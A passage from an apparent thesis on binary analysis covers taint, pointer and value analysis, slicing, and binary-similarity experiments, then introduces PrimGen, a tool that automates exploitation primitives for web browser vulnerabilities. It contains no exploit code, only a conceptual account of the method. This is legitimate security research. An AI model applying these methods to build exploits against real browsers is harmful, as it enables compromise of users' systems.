rax_10   -1 R HeapPtr,0x401147          0 0x4011c0 main
rax_11   -1 R HeapPtr,0x401147          0 0x4011c8 main
rax_12   -1 R HeapPtr,0x401182          0 0x4011d2 main
rax_13   -1 R HeapPtr,0x401147          0 0x4011d6 main
rax_1     0 D Taint,0x40118f            0 0x40118f main
rax_1     0 D Taint,0x40118f            0 0x401154 f1
rax_2    -1 R Taint,0x40118f            0 0x401154 f1
rdx_0    -1 R Taint,0x40118f            0 0x401156 f1
rax_3     0 D Taint,0x40118f            0 0x40115d f1
rax_5     0 D Taint,0x40118f            0 0x4011a9 main
rax_6    -1 R Taint,0x40118f            0 0x4011a9 main

Figure 3.15: PtsTo and Taint output of the program presented in Figure 3.16.

terminates. With the taint analysis we have presented so far, we cannot see the taint after f1 is called. We cannot even see the taint in f1 itself. Here the pointer analysis can help us to improve precision. The analysis reveals the connection between el and el2, as well as the connection between el->id and el_p->id. Now the taint analysis can use this information to taint el2->id and see that the access after f1 is to be tainted. In the assembly code, the tainting of el->id happens at 0x40118f. Without pointer information the taint propagation stops there. For clarity, we present the output of the pointer and taint analysis in Figure 3.15. With the instruments that we have presented, the analysis is able to derive alias pairs. We highlighted the relevant lines in Figure 3.15 to explain the procedures. The highlighted addresses 0x40118b and 0x40118f correspond to lines 13 and 14, respectively. The address 0x401150 is where line 8 starts in function f1. With the pointer descriptors HeapPtr,0x401182 at 0x40118b and HeapPtr,0x401182,0x40119c at 0x40118f, we see that the registers rax_1 [4] point to the same address. The taint is applied at address 0x40118f. With rule 5 of our

[4] The same name of both registers is coincidental.

algorithm in Figure 3.14, the analysis can derive the fact that the dereferenced value at address 0x401154 is tainted, as we can see in Figure 3.15. Moreover, we can now see that el->next->id is also tainted after the call to f1, which is indicated by the Taint fact that corresponds to address 0x4011a9. This strategy is a valuable building block and finds broad application in the field of vulnerability research. In the next chapters we show how the concepts work in practice.
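The descriptor matching that makes this glue work, i.e., what the contains functor checks for rule 5, can be sketched in a few lines. The descriptor strings follow the format seen in Figure 3.15; the Python function is illustrative only, not the actual built-in functor:

```python
# Sketch of the contains check: a pointer descriptor such as
# "HeapPtr,0x401182" is contained in "HeapPtr,0x401182,0x40119c",
# i.e., one descriptor is a prefix of the other's context. The check is
# direction-agnostic, allowing the walk from caller to callee and back.

def contains(descr_a, descr_b):
    a, b = descr_a.split(","), descr_b.split(",")
    short, long_ = (a, b) if len(a) <= len(b) else (b, a)
    return long_[:len(short)] == short

print(contains("HeapPtr,0x401182", "HeapPtr,0x401182,0x40119c"))  # True
print(contains("HeapPtr,0x401147", "HeapPtr,0x401182,0x40119c"))  # False
```

Applied to Figure 3.15, this is exactly why the facts for rax_1 in main and rax_1 in f1 are recognized as aliases: one descriptor extends the other by the callsite 0x40119c.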

3.5.2 Value Propagation

As with all derivatives we present, the common ground is our transition descriptors, which describe how we propagate information from one program point to another. However, this time we are interested in the actual concrete values that are propagated and evaluated, rather than symbolic values as before. Value propagation is not to be confused with constant propagation, where a variable after propagation holds a constant value for all possible executions. Rather, we are interested in how concrete values evolve over all execution paths. This can be helpful for several reasons: 1) incorporating values from a dynamic analysis, 2) evaluating possible error codes that are returned, 3) determining value ranges, 4) concretizing symbolic expressions and evaluating their effects. Speaking of a derivative, value propagation can be expressed in the same pattern, following the same ideas as the procedures we presented for the pointer analysis. Accordingly, the predicate we define has a similar encoding to the predicates we defined for pointer and taint analysis. The following rules derive Concrete facts by querying for constant-to-register/memory events.

// direct assignment to a register
Concrete(reg, -1, "R", to_string(cst_num), bb, order, ctx) :-
    chain_cr(cst_num, reg, bb, order, ctx).

// direct assignment to memory
Concrete(reg, disp, "M", to_string(cst_num), bb, order, ctx) :-
    chain_cm(cst_num, reg, disp, bb, order, ctx).

Here, we are particularly interested in the constants that are hard-coded into the binary. We refrain from presenting a thorough specification of the algorithm, as it follows the same principles as the algorithms for the other analysis derivatives. The rules above are starter-rules that get the algorithm running without any user intervention. These rules alone help us to track error codes, map them onto f_ret registers in the caller, and build a base for interesting patterns, such as signed/unsigned conversion errors or missing checks. We might want to introduce Concrete facts or starter-rules that constrain the terms for a concretization. With this procedure, we basically instrument the code, allowing us to concretize any register or memory operand at any program point, and each analysis that uses or builds on Concrete facts adapts to the changes transparently.
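The combined effect of the starter-rules plus the usual register-move propagation can be sketched as a small fixpoint over value sets. The Python below is illustrative (simplified fact shapes, hypothetical names), not the actual Soufflé rules:

```python
from collections import defaultdict

# Sketch: derive Concrete facts from constant-to-register events (chain_cr)
# and propagate them along register moves (chain_rr), collecting the set of
# values a register may hold over all paths.

def concrete_facts(chain_cr, chain_rr):
    vals = defaultdict(set)
    for cst, reg in chain_cr:          # starter-rule: constant to register
        vals[reg].add(cst)
    changed = True
    while changed:                     # fixpoint over register moves
        changed = False
        for src, dst in chain_rr:
            new = vals[src] - vals[dst]
            if new:
                vals[dst] |= new
                changed = True
    return dict(vals)

# mov eax, -1 / mov eax, 0 on different paths; mov edi, eax afterwards:
# edi may hold either value, e.g. a propagated error code.
facts = concrete_facts(chain_cr=[(-1, "eax"), (0, "eax")],
                       chain_rr=[("eax", "edi")])
print(sorted(facts["edi"]))  # [-1, 0]
```

Collecting sets rather than single values is what distinguishes this from constant propagation: a register is allowed to hold different concrete values on different paths.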

3.5.3 Slicing

Program slicing is another classic in the line of program analysis techniques that help to sharpen the picture of a program's behavior. Given a program point p and a set of program variables, the idea is to determine all statements that might affect the values of the program variables at p. The resulting set of statements is a slice. The set of variables at the statements can further be restricted to the uses and definitions of the statement at p. The idea, originally discussed by Weiser [211], has gone through a wealth of extensions and improvements corresponding to different needs [184]. Ottenstein and Ottenstein [155] pointed out that the PDG is well suited for the intraprocedural slicing problem: one traverses all reachable paths with respect to the variable of interest and puts the visited nodes into the slice. It is still common practice to work on the PDG when program slicing is needed. The notion of valid or realizable paths, i.e., paths that respect the call-stack, is important in the interprocedural case. The concept of using PDGs was extended by Horwitz et al. [101], who proposed the System Dependence Graph (SDG) as a suitable representation for interprocedural slices. We treat slicing as a taint problem: a forward slice is our forward taint. The only difference is that for each program point we also take the control dependency into account, i.e., the conditionals that enclose the program points and which have to be sliced as well. Analogously, backward slicing is treated as a backward taint problem, again by incorporating the control dependency into the analysis. In Section 3.5.1 we saw that a pointer analysis can improve the precision of the taint analysis. The same property holds for slicing. In the backward case we need to adapt our rule-sets and adjust them for a backward propagation.
For instance, for chain_rm descriptor matches, which describe a register-to-memory move, we write a slicing rule where the propagation flows in the opposite direction using the same descriptor. We can use the same set of rules as in the forward-slicer/taint case and change their direction. For this reason we will not specify the algorithm, as its concepts are the same. The CDG generation for each function can either be implemented in the frontend and incorporated into Mental-IR, or directly implemented in the backend. Because the frontend of Mentalese has all the instruments to build the CDG, we use the former approach.
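Conceptually, a backward slice is a backward taint pass that also pulls in enclosing conditionals. The following Python sketch illustrates this on a toy def-use encoding; all names and the fact shapes are illustrative, and it assumes loop-free, straight-line code for brevity:

```python
# Sketch: backward slicing as backward taint plus control dependency.
# def_use: stmt -> (defined_var, set_of_used_vars)
# ctrl_dep: stmt -> list of enclosing conditional statements

def backward_slice(def_use, ctrl_dep, criterion):
    stmt0, var0 = criterion
    wanted, slc = {var0}, set()
    for s in sorted(def_use, reverse=True):      # walk backwards from stmt0
        if s > stmt0:
            continue
        defined, uses = def_use[s]
        if defined in wanted:
            slc.add(s)
            wanted |= uses                       # backward taint step
            for c in ctrl_dep.get(s, ()):        # enclosing conditionals
                slc.add(c)                       # join the slice as well
                wanted |= def_use[c][1]
    return slc

du = {1: ("a", set()),     # a = input()
      2: ("b", {"a"}),     # b = a + 1
      3: ("", {"b"}),      # if (b > 0):   <- conditional
      4: ("x", {"b"})}     # x = b         (guarded by statement 3)
print(sorted(backward_slice(du, {4: [3]}, (4, "x"))))  # [1, 2, 3, 4]
```

Note how statement 3 enters the slice only through the control dependency of statement 4; this is the part a plain backward taint would miss.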

 1  typedef struct element {
 2      int id;
 3      struct element* next;
 4  } element_t;
 5
 6  void f1(element_t* el_p) {
 7      element_t* el2 = (element_t*) malloc(sizeof(element_t));
 8      el2->id = el_p->id + 1;
 9      el_p->next = el2;
10  }
11
12  int process(int id) {
13      element_t* el = (element_t*) malloc(sizeof(element_t));
14      el->id = id;
15      f1(el);
16      // access el->next->id is tainted
17      ...
18  }

== process ==
...
0x000000000040117d  mov edi,0x10
0x0000000000401182  call 0x401040
0x0000000000401187  mov QWORD PTR [rbp-0x8],rax
0x000000000040118b  mov rax,QWORD PTR [rbp-0x8]
0x000000000040118f  mov DWORD PTR [rax],rbx    ; rbx = id
0x0000000000401195  mov rax,QWORD PTR [rbp-0x8]
0x0000000000401199  mov rdi,rax
0x000000000040119c  call 0x401136
0x00000000004011a1  mov rax,QWORD PTR [rbp-0x8]
0x00000000004011a5  mov rax,QWORD PTR [rax+0x8]
0x00000000004011a9  mov eax,DWORD PTR [rax]
...

== f1 ==
0x0000000000401136  push rbp
0x0000000000401137  mov rbp,rsp
0x000000000040113a  sub rsp,0x20
0x000000000040113e  mov QWORD PTR [rbp-0x18],rdi
0x0000000000401142  mov edi,0x10
0x0000000000401147  call 0x401040
0x000000000040114c  mov QWORD PTR [rbp-0x8],rax
0x0000000000401150  mov rax,QWORD PTR [rbp-0x18]
0x0000000000401154  mov eax,DWORD PTR [rax]
0x0000000000401156  lea edx,[rax+0x1]
0x0000000000401159  mov rax,QWORD PTR [rbp-0x8]
0x000000000040115d  mov DWORD PTR [rax],edx
0x000000000040115f  mov rax,QWORD PTR [rbp-0x18]
0x0000000000401163  mov rdx,QWORD PTR [rbp-0x8]
0x0000000000401167  mov QWORD PTR [rax+0x8],rdx
0x000000000040116b  nop
0x000000000040116c  leave
0x000000000040116d  ret

Figure 3.16: C routine and its x86-64 assembly code (O0).

3.6 Experimental Study: Pointer Analysis

As we saw in the previous sections, the pointer analysis is a valuable building block that finds versatile usage in aiding the precision of other analyses. In this section we provide empirical data concerning the pointer analysis and show that it can contribute to the precision of binary similarity. The following experiments are performed on an Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz with 16GB of RAM. This is lightweight hardware for static analysis: we chose this setup to evaluate how our analysis scales on commodity hardware, i.e., more accessible hardware which might be the workstation of an analyst. Table 3.3 shows the number of facts extracted according to the EDB facts of Table 3.1. The numbers are evaluated for the 10 largest binaries in the GNU Coreutils utility suite. The Coreutils are small programs built with the UNIX philosophy in mind: do one thing and do it well. Many of the functions mentioned in the table are common to multiple utilities. The main functionality of each binary is mostly scaled down to a single source file. This simplicity seems to be reflected by the pointer analysis as well, as we did not have to adjust the context-sensitivity or the flow-sensitivity. Each analysis finished within a second. Table 3.4 lists the number of facts for x86-64 concerning nginx and the three largest Binutils. Comparing the highest number (objdump) to the highest among the Coreutils (ginstall), we see an increase by a factor of almost 13. A higher number of facts does not necessarily mean a higher complexity, but the numbers are a good indicator. As Table 3.5 shows, our pointer analysis faces a greater challenge with these programs. With FS + RD we denote the partial flow-sensitivity enhanced by the reaching definition analysis (see Section 3.4.3). Accordingly, FS - RD denotes the partial flow-sensitivity gained through SSA alone. Each k-column represents the context-sensitivity level. A level of zero (k0) transforms the analysis into a pure forward propagation of points-to information, i.e., no information is gained through the callee. This complies with the definition, as a level of zero means that we are not interested in any information that comes from a callee. The results in Table 3.5 show the performance (in seconds) for different k-values and flow-sensitivity settings. The first and second number (d1/d2) are the performance values for O0 and O2, respectively. Missing numbers (indicated by a dash) denote that our analysis exhausted our 16GB of RAM. In some cases the number of new points-to facts saturates with increasing k-sensitivity. We can see this happen for nginx optimized with O2: the performance is the same from a level of 1 onwards.

Table 3.3: GNU Coreutils v8.32 (O0 compilation): Number of facts.

Binary #Functions #Facts (Armv7) #Facts (x86-64)

cp 520 216286 259302

df 329 153973 158399

dir 534 287612 245899

du 529 442890 443992

env 179 85014 73024

ginstall 570 237629 285799

ls 534 287612 245899

mv 537 260469 261571

rm 296 137569 129250

stat 297 179871 126354

Table 3.4: Number of facts for Binutils v2.35 and nginx v1.17.9.

Binary Functions Facts

nginx 1634 1842856

ar 2121 2469669

nm-new 2222 2678793

objdump 2801 3572471

Turning off the enhanced flow-sensitivity gets us to a k-sensitivity of 2. The number of facts extracted for the Binutils is reduced by 9 percent for ar and 15 percent for objdump. This has an impact on the performance, which we can see for O2 in Table 3.5. For all binaries in our testsuite, including the Coreutils, the memory facts are reduced by 50 percent on average. Most of these facts are stack related, which has an impact on the reaching definition analysis that we perform on stack variables to improve the partial flow-sensitivity (see Section 3.4.3). The numbers are listed in Table 3.6. This explains why we can reach higher levels

Table 3.5: Pointer Analysis performance: O0/O2 seconds in relation to k-sensitivity and flow-sensitivity. FS-RD denotes partial flow sensitivity (FS) without a reaching definition analysis (RD) for stack variables. For missing values, the analysis ran out of RAM.

             Partial FS + RD                                  FS - RD
Binary    k0      k1        k2        k3       k4       k0     k1     k2     k3     k4
ar        16/10   28/7      −/17      −/90     −/−      8/6    8/7    9/12   17/47  −/−
nginx     11/5    16.7/5.4  25.6/5.6  330/5.8  −/5.8    5/3    8.7/4  9.5/4  80/4   −/4
nm-new    17/17   69/17     −/53      −/−      −/−      8/6    12/9   39/39  −/−    −/−
objdump   25/15   −/23      −/23      −/−      −/−      12/8   23/9   98/16  −/−    −/−

Table 3.6: Reduction in the number of Memory-facts from O0 to O2 for x86-64.

Binary Reduction in %

ar        45
cp        58
df        54
dir       50
env       54
ginstall  50
ls        50
mv        48
nginx     50
nm-new    49
objdump   48

for both the enhanced flow-sensitive analysis and its counterpart, because many stack accesses are optimized away. In Figure 3.17 we illustrate the number of points-to facts for the Binutils and nginx. Due to the high number of facts for nginx, we present the numbers for its O2 counterpart separately on a different scale. We can see that with an increasing level of context-sensitivity (k values) the number of facts explodes.

This explains why we ran out of RAM for the enhanced flow-sensitive analysis [5]. Recall that our enhanced flow-sensitive analysis computes an on-demand reaching definition analysis for each stack location that holds a pointer. This results in new facts for each reaching program point.

Towards Similarity

Pointer analysis, while limited in this regard, can also aid the process of binary similarity. Our strategy is to determine memory accesses that are not stack-based and for which we know that they are pointers to some objects. We can express this by the following interplay of rules:

Access(base, disp, "load", bb, order, ctx) :-
    Memory(_, "load", "Reg", base_id, disp, bb, order, ctx),
    Register(base_id, base, "u", _, bb, order, ctx).

Access(base, disp, "store", bb, order, ctx) :-
    Pointer(_, "store", "Reg", base_id, disp, bb, order, ctx),
    Register(base_id, base, "d", _, bb, order, ctx).

/*
 * AP ~ Memory Access through a pointer,
 * derived by a points-to fact
 */
AP(descr, disp, bb, order, ctx) :-
    Access(base, disp, _, bb, order, ctx),
    !StackBased(base),
    PtsTo(base, -1, "R", descr, _, bb, order, ctx).

Each derived AP fact gives us a pointer-descriptor (see Definition 7) and the displacement added to the pointer to access the memory location. With these access patterns, we map each descriptor to a set of accessed fields. Combined with PPtsP facts (pointer-points-to-pointer), we give weight to fields that point to a pointer. The following output shows a snippet of AP facts derived when the rules are applied to objdump:

['HeapPtr,0x559cc8,xmalloc', '56', '0x444885', 'ieee_start_struct_type'],
['HeapPtr,0x559cc8,xmalloc', '56', '0x404d73', 'try_print_file_open'],
['HeapPtr,0x559cc8,xmalloc', '56', '0x4053d3', 'show_line'],
['HeapPtr,0x559cc8,xmalloc', '56', '0x4053df', 'show_line'],
['HeapPtr,0x559cc8,xmalloc', '56', '0x4053ed', 'show_line'],
['HeapPtr,0x559cc8,xmalloc', '56', '0x405416', 'show_line'],
['HeapPtr,0x559cc8,xmalloc', '56', '0x405427', 'show_line'],

['HeapPtr,0x559cc8,xmalloc', '120', '0x434f84', 'stab_record_variable'],
['HeapPtr,0x559cc8,xmalloc', '120', '0x434fc5', 'stab_record_variable'],
['HeapPtr,0x559cc8,xmalloc', '120', '0x434fe4', 'stab_emit_pending_vars'],
['HeapPtr,0x559cc8,xmalloc', '120', '0x435051', 'stab_emit_pending_vars'],

[5] We work with 16GB on purpose, which is a lightweight setup.

The descriptor tells us that we are confronted with a heap pointer that was allocated at 0x559cc8 in xmalloc. The output also tells us which displacements are added to the pointer to access memory and in which function these accesses occur. For instance, the first line of the output says that in ieee_start_struct_type, at address 0x444885, 56 is added to the pointer to access memory. We build a hash map that maps this descriptor to the set of fields we can derive through our analysis. We refer to this map as a descriptor-map. We extend the set of fields with the output we gain from PPtsP to determine fields that are pointers. The following output lists the field offsets we gain from PPtsP: [0, 8, 16, 24, 32, 40, 80, 88, 120, 136, 416]

The output tells us that adding each of these offsets to the base pointer that comes from 0x559cc8 gives us references to memory cells (fields) which hold a pointer. In the set of all fields associated with the pointer-descriptor, we now over-represent those fields that point to pointers, building a multiset of fields. To compare two binaries, we compute the Jaccard index between each of these sets in each binary. The motivation behind this approach is that certain objects have distinctive field offsets. In our example we see field offsets of 120 and 416. Both fields might already have a distinctive character because of their offsets, but they become even more distinctive due to the property that they hold pointers. For a good similarity match we need structures with many fields. In our experiments we only take descriptors into account that are associated with sets of seven or more fields. Although we can also use this strategy to match several functions, the capabilities for this are limited. The focus of our strategy lies not in matching functions, but in matching a stripped binary. We evaluated the approach on our testsuite binaries listed in Table 3.3 and Table 3.4. Recall that for the Coreutils there are no restrictions on the analysis, i.e., we do not restrict the context-sensitivity level k and we use the enhanced flow-sensitivity method. The experiments for the Binutils, however, are performed with a k-sensitivity of zero. We do this in favor of the analysis time. Our results suggest that starting with k = 0 is a good choice, and we can successively increase k when needed. The match is determined for O0 vs O2 and vice versa. We also added so-called distro versions [6] of the Binutils and nginx to our testsuite, which are matched against O2. The results for the first two ranks are listed in Table 3.7.
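The comparison step can be sketched as follows. Only the Jaccard computation and the over-representation of pointer-holding fields mirror the description above; field_multiset and the example offsets are illustrative:

```python
# Sketch: comparing descriptor-maps via the Jaccard index. Fields known to
# hold pointers (derived from PPtsP) are tagged a second time, turning the
# plain field set into a multiset and giving those fields extra weight.

def jaccard(a, b):
    return len(a & b) / len(a | b) if a | b else 0.0

def field_multiset(fields, ptr_fields):
    # every field once; pointer-holding fields get an extra tagged copy
    return {(f, "field") for f in fields} | {(f, "ptr") for f in ptr_fields}

obj_a = field_multiset({0, 8, 56, 120, 416}, {8, 120, 416})
obj_b = field_multiset({0, 8, 56, 120, 416}, {8, 120})
print(round(jaccard(obj_a, obj_b), 3))  # 0.875
```

A descriptor whose field set differs only in one pointer-holding field still scores high, while unrelated objects with different offset patterns score near zero.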

[6] Ubuntu 18.04.4 LTS

[Figure 3.17 (plots): number of Points-To facts (y-axis) against the k-sensitivity level 0-4 (x-axis) for objdump, ar, nm-new (up to ~3×10^6 facts), and nginx (up to ~4×10^7 facts for O0; its O2 counterpart shown separately up to ~10^5), each in the variants pfs/efs and O0/O2.]

Figure 3.17: Number of Points-To facts for Binutils and nginx in relation to k-sensitivity and flow-sensitivity. With efs we denote the partial flow-sensitivity enhanced by reaching definitions; with pfs we refer to its counterpart without reaching definitions.

Except for three cases, each binary is correctly matched within the first two ranks. For objdump-O2, objdump is ranked 3; mv shows a stronger attachment to the Binutils and its O2 counterpart is ranked 4; ginstall shows a similar pattern and is ranked 3. For objdump we can tweak the match by increasing k to 1, improving its rank to 1. In Figure 3.18 we illustrate all matches that are within the top-10. Scores outside the top-10 are given a score of zero. Our experiments with ARMv7 show similar results: for ARM, our testsuite consists of Binutils and Coreutils from Debian Jessie and Bullseye [7], where the versions of the programs are five years apart. We match the pool of old programs against the pool of their newer versions. The results are listed in Table 3.8. Similar to our x86 experiments, we illustrate all matches within the top-10 in Figure 3.18. The results show that the Coreutils are all ranked in the top-2. Binaries from the same family (Binutils vs. Coreutils) show a stronger affinity to each other, which is consistent with our expectation. The quality of the matching can be influenced by many factors, such as aggressive optimization, quality of the CFG reconstruction, obfuscation, or many changes to the code base. We can see that the newer versions of objdump and readelf do not match well against the older versions. This suggests that the new versions might have undergone many code changes. We investigated this for readelf and objdump by diffing their corresponding versions. Indeed, for readelf we observe changes of around 10k lines of code, and for objdump around 2k lines of code. These numbers are relatively large compared to nm and ar, where the changes are between 200 and 370 lines. The larger amount of changes to objdump and readelf suggests an influence on the matching quality. Overall, the experiments show promising results given that the whole process runs within a minute for the binaries we tested.
We believe that the approach we presented is well suited for a first run that can be combined with more fine-grained similarity approaches, such as [158]. Of course, the timings depend on the sensitivity of the pointer analysis, which we can successively increase on demand. However, our experiments indicate that in most cases k = 0 might be sufficient. It is worth the effort to investigate this further on larger testsuites and we leave this for future work.

[7] Debian testing at the time of writing.

Table 3.7: Ranks 1 and 2 of matches compiled for x86-64: Binutils are in v2.35, Coreutils in v8.32, and nginx in v1.17.9. Binaries denoted with distro are taken from Ubuntu 18.04.4 LTS. Binutils-distro are in v2.30, and nginx-distro in v1.14.0.

Binary Rank Binary Rank

ar          1: ar-O2       2: nm-new-O2                 nm-new           1: nm-new-O2     2: objdump-O2
ar-O2       1: ar          2: nm-new                    nm-new-O2        1: ar            2: nm-new
ar-distro   1: ar-O2       2: nm-new-O2                 nginx            1: nginx-O2      2: ar-O2
cp          1: cp-O2       2: dir-O2                    nginx-O2         1: nginx-distro  2: nginx
cp-O2       1: cp          2: df                        nginx-distro     1: nginx-O2      2: nm-new-O2
df          1: env-O2      2: df-O2                     objdump          1: objdump-O2    2: nm-new-O2
df-O2       1: df          2: env                       objdump-O2       1: nm-new        2: ar | 3: objdump
dir         1: dir-O2      2: ls-O2                     objdump-distro   1: objdump-O2    2: df-O2
dir-O2      1: dir         2: ls                        mv               1: objdump-O2    2: ar-O2 | 4: mv-O2
env         1: env-O2      2: df-O2                     mv-O2            1: mv            2: ginstall | 3: ginstall-O2
env-O2      1: df          2: env                       ginstall         1: objdump-O2    2: ar-O2
ls          1: dir-O2      2: ls-O2                     ginstall-O2      1: mv            2: ginstall
ls-O2       1: dir         2: ls


Figure 3.18: All matches within the top-10 ranks. The upper matrix shows the results for x86-64, the lower matrix the results for ARMv7. A score that does not make it into the top-10 is set to 0. O0 vs O0 and O2 vs O2 binaries are not matched for x86; similarly, for ARMv7 the versions old vs old and new vs new are not matched.

Table 3.8: Ranks 1 and 2 of matches for ARMv7 (EABI LE): Binutils v2.25 vs v2.34 and Coreutils v8.23 vs v8.32. If the matching score between two versions of the same program is not in the top-2, its rank is given explicitly.

Binary          Rank 1        Rank 2        Lower rank
ar-2.25         ar-2.34       objdump-2.34
ar-2.34         ar-2.25       gprof-2.25
gprof-2.25      objdump-2.34  ar-2.34       3: gprof-2.34
gprof-2.34      gprof-2.25    ar-2.25
nm-2.25         objdump-2.34  ar-2.34       3: nm-2.34
nm-2.34         gprof-2.25    nm-2.25
objdump-2.25    objdump-2.34  ar-2.34
objdump-2.34    ar-2.25       nm-2.25       4: objdump-2.25
readelf-2.25    readelf-2.34  objdump-2.34
readelf-2.34    ar-2.25       nm-2.25       5: readelf-2.25
cp-8.23         cp-8.32       rm-8.32
cp-8.32         cp-8.23       mv-8.23
df-8.23         df-8.32       ls-8.32
df-8.32         ls-8.23       df-8.23
ls-8.23         ls-8.32       df-8.32
ls-8.32         ls-8.23       df-8.23
mv-8.23         rm-8.32       mv-8.32
mv-8.32         mv-8.23       rm-8.23
rm-8.23         rm-8.32       mv-8.32
rm-8.32         rm-8.23       mv-8.23

4 Towards Automated Generation of Exploitation Primitives for Web Browsers

Contents

4.1 Model and Assumptions ...... 89
4.2 Design ...... 93
    4.2.1 Finding Sinks ...... 95
    4.2.2 Program Paths ...... 96
    4.2.3 Triggering Input ...... 102
    4.2.4 Implementation Details ...... 103
4.3 Evaluation ...... 103
    4.3.1 Exploitation Primitive Trigger (EPT) ...... 103
    4.3.2 Fine Tuning ...... 106
4.4 Discussion and Limitations ...... 106
4.5 Related Work ...... 107
4.6 Conclusion ...... 108

Software vulnerabilities pose a severe threat in practice as they are the root cause behind many attacks we observe on the Internet on a daily basis. A few years ago, attackers shifted away from server-side vulnerabilities to client-side vulnerabilities. Nowadays, web browsers in particular are an attractive target given their complexity (Mozilla Firefox, for instance, contains about 18 million lines of code [154]) and large user base. Browsers incorporate many complex features, including the processing of different languages (e.g., various markup languages, JavaScript (JS), WebGL) and the interpretation of many file formats (e.g., images, audio, video, or Office files). As a

result, browsers provide a large attack surface, and security-critical vulnerabilities are found continuously. To counter such vulnerabilities, various mitigation strategies emerged [194] and were incorporated into browsers themselves and the underlying operating system to make the exploitation of a given vulnerability as difficult as possible. As a result, the exploitation of a browser vulnerability became a time-consuming, multi-step task: starting from (i) discovering the vulnerability, (ii) minimizing the crashing input, (iii) verifying exploitability, and (iv) building upon the crashing input to gain code execution or escalate privileges. Unfortunately, most of these tasks are commonly performed manually in practice. Hence, exploiting a browser vulnerability is nowadays a complex task, and it is not uncommon that several man-months are invested into creating a working exploit [189]. This is often necessary to prove that a given bug is indeed security-critical and has to be eliminated before victims are compromised and suffer financial or reputation loss, or other kinds of damages. To explain the underlying challenges, we first need to focus on the typical steps of a modern browser exploit. Usually, at a certain point in the exploit-development process, the developer is confronted with a state where she controls a CPU register with a value pointing to controlled memory. The contents of this memory region under her control can be influenced with heap spraying. The subsequent step typically requires substantial manual debugging of the program flow to find a desired action once the bug is triggered. This might be the propagation of controlled memory content into the instruction pointer register to divert the control flow, or the propagation into a write instruction to alter fields of internal browser objects.
This way, the exploit gains additional capabilities such as extended reading/writing of memory or escalated privileges due to an altered security flag. For example, ExpLib2 is a specially prepared exploit plugin in the form of a JavaScript (JS) library: it requires only a single memory write to gain complete remote code execution in Internet Explorer 11 [129, 41, 45]. Nonetheless, achieving even a single, illegitimate memory write can be difficult and time-consuming in practice. There is a line of work on automated exploit generation methods, such as AEG [12] or Mayhem [39], whose general goal is to find exploitable bugs and automatically generate exploits for them. However, AEG focuses on simpler bug classes such as continuous, stack-based buffer overflows and format-string vulnerabilities. Due to improvements in software testing and exploit mitigations in the browser context, analysts focus on use-after-free, type confusion, and uninitialized-variable bugs. Mayhem [39] also approaches automated exploit generation; it shares the limited set of bug classes with AEG, but supports the analysis of binary executables.

In this chapter, we address the open challenge of automatically creating exploit primitives (e.g., attacker-controlled reads and writes) and crafting exploitation primitive triggers for a given crashing input in web browsers. We present an automated analysis method that takes a JS/HTML file (i.e., template) that crashes a given browser instance as input, and modifies the JS objects in such a way that the resulting JS file (i.e., exploitation primitive trigger) performs attacker-desired actions (i.e., exploit primitives), such as the above-mentioned memory write. We developed our techniques on top of Mentalese, our binary analysis framework, which incorporates several analysis techniques to achieve that degree of automation. We use the taint and pointer analysis of Mentalese to track the attacker-controlled data from the crashing input into sinks of interest (e.g., controlled memory writes or reads). This analysis yields execution paths which start at the control of a CPU register induced by the crashing input, and end in sinks where controlled input is involved in useful actions, e.g., an arbitrary memory write or controlling the instruction pointer. These candidate paths are symbolically evaluated to filter out unsatisfiable paths. Although browsers are very complex binaries, our approach does not suffer from common problems such as path explosion, given that we perform symbolic execution only on selected program paths and not on complete programs. The remaining paths are emulated with the attacker-controlled memory from the crashing input, and this data is adjusted accordingly to be able to reach the end of the path, i.e., the corresponding sink. Finally, memory maps are created based on the adjusted data. These serve as a base to generate scripts with JS objects, which the vulnerable browser can execute. As a result, the generated JS files perform the desired exploit primitive defined by the sink.
To demonstrate the practical feasibility of the proposed method, we implemented a tool called PrimGen on top of Mentalese and conducted our evaluation on real-world browser vulnerabilities for Mozilla Firefox, Internet Explorer, and Google Chrome. Our tool identified 486 useful exploit primitives which enhance exploits with arbitrary Write-Where, Write-What-Where and EIP control primitives. We were able to generate 48 JS scripts which execute these primitives.

4.1 Model and Assumptions

Based on Mentalese, our goal is to present techniques that enable a high degree of automation for the exploitation of software bugs in web browsers. It is not our goal to develop an attack to bypass recently introduced mitigations, nor to approach new bug-finding mechanisms. As such, our goal is to automate a critical exploitation step, namely the process starting from an attacker-influenced location in the target browser binary induced by a vulnerability, to a point where an attacker-desired action is conducted. We assume the presence of a memory corruption vulnerability that can be triggered by the attacker. The bug is not prepared and provides no useful primitive. However, we assume that a heap spray exists to provide changeable, but still unusable memory contents. Furthermore, we assume that only the crashing input (i.e., the bug trigger in JS) and the initial point of control are known to the attacker, e.g., a CPU register is controlled. We assume that the target process is protected by widely-used defenses like stack canaries, W ⊕ X, and ASLR as deployed by major operating systems. This work focuses on the automation of crafting useful primitives, rather than bypassing more sophisticated defenses. Thus, we consider defenses such as virtual table verification [197], Control-Flow Integrity (CFI) [1, 218, 220, 33] and process isolation (sandboxing) [143, 166] out of scope. Nevertheless, bypassing these features is usually performed after the attacker has already gained a sufficient amount of control, which is what we attempt to automate.

Modern Vulnerability Exploitation

To better understand the exploitation process of a memory corruption vulnerability in web browsers, we divide it into several steps that are necessary to gain control of a vulnerable browser. In the following, we provide an overview and explicitly emphasize the different steps we attempt to automate.

1) Vulnerability discovery. Before being able to exploit a vulnerability in order to prove that it is security-critical, it has to be discovered in the first place. Nowadays, this is usually achieved with techniques such as fuzzing [208, 88], symbolic execution [39, 182], or manual code review. The outcome is usually an input test case which ideally triggers the vulnerability and allows further analyses. We assume this as a prerequisite for our approach.

2) Vulnerability test case preparation. Depending on the size and complexity of the vulnerability test case (i.e., an HTML or JS file), it might be necessary to (manually) minimize and alter the test case. From an exploitation perspective, a small vulnerability test case (VUT) ideally triggers the bug and crashes the target process in a deterministic way, given that this allows an easier investigation. A VUT


Figure 4.1: Architecture implemented by PrimGen.

is sometimes also called a crashing input. Based on the vulnerability type and the affected browser component, there might already be signs of attacker control. These include bogus register values or memory content usually provoking the crash. Hence, we define a VUT to be a user-controlled input which provides a first and basic control point in the program flow (i.e., CPU registers or memory contain attacker-controlled content). Our approach starts with a VUT that provides a control point (also called control source). This is where our automation approach begins.

